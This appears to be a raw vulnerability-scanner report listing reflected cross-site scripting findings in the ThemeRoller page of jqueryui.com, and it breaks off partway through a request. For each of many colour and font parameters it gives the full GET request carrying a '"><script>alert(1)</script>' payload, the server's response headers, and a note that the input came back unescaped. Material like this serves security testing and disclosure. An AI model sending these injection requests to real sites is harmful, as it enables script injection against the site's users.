GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff52361"><script>alert(1)</script>1f81954189a&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87309"><script>alert(1)</script>45cc4a066c2 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363687309"><script>alert(1)</script>45cc4a066c2&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4380f"><script>alert(1)</script>962bd0de158 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d59874380f"><script>alert(1)</script>962bd0de158&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d1e"><script>alert(1)</script>6798d84993f was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serifc1d1e"><script>alert(1)</script>6798d84993f&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d06c"><script>alert(1)</script>c2aa43a121c was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em2d06c"><script>alert(1)</script>c2aa43a121c&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 973a4"><script>alert(1)</script>cb8eec49bfe was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold973a4"><script>alert(1)</script>cb8eec49bfe&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120111
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae84d"><script>alert(1)</script>80ac578362b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01ae84d"><script>alert(1)</script>80ac578362b&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ef9"><script>alert(1)</script>f2451ef5de1 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bddc5ef9"><script>alert(1)</script>f2451ef5de1&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8451"><script>alert(1)</script>ff0e6439862 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5e8451"><script>alert(1)</script>ff0e6439862&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880ad"><script>alert(1)</script>d64a7ef281d was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a880ad"><script>alert(1)</script>d64a7ef281d&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b3d2"><script>alert(1)</script>bf07ccca7fe was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f31b3d2"><script>alert(1)</script>bf07ccca7fe&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d4a"><script>alert(1)</script>7cbe5359106 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff87d4a"><script>alert(1)</script>7cbe5359106&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0c5a"><script>alert(1)</script>e6d1361b6b7 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0f0c5a"><script>alert(1)</script>e6d1361b6b7&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=